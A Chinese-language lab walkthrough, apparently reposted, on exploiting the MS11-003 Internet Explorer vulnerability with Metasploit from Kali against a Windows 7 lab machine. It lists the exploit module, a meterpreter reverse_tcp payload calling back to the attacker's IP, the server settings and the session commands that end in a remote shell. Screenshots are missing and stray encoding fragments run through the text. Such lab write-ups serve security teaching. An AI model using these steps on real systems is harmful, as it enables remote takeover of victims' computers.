前言：

windows7IE溢出攻擊

實(shí)驗(yàn)環(huán)境：

工具：metasploit

靶機(jī)兩臺(tái)：windows 7和kali2020

攻擊機(jī)IP地址：10.20.29.129

被攻擊機(jī)IP地址：10.20.29.134

步驟：

1、在kali里面打開metasploit漏洞利用框架

2、搜索ms11-003漏洞利用模塊?

3、使用利用模塊use exploit/windows/browser/ms11_003_ie_css_import

4、設(shè)置payload? ? set payload windows/meterpreter/reverse_tcp

5、查看options

6、配置options信息（SRVHOST、LHOST均為Kali IP、URIPATH＋任意數(shù)）

set srvhost 10.20.29.129 set lhost 10.20.29.129 set uripath 8

7、開始攻擊 run/exploite，會(huì)生成一個(gè)URL，復(fù)制鏈接使用Windows7 IE瀏覽器訪問

8、打開windows 7 并進(jìn)行訪問

9、這時(shí)kali虛擬機(jī)出現(xiàn)這種情況說明連接成功

10、查看session會(huì)話

11、sessions -i 1 連接windows7

選擇sessions會(huì)話的時(shí)候可能會(huì)連接不成功，那么換一個(gè)sessions即可

12、獲取shell，并輸入ipconfig

?

?

?

?

?

總結(jié)

以上是生活随笔為你收集整理的kail利用msf工具对ms11-003漏洞入侵渗透Win7的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。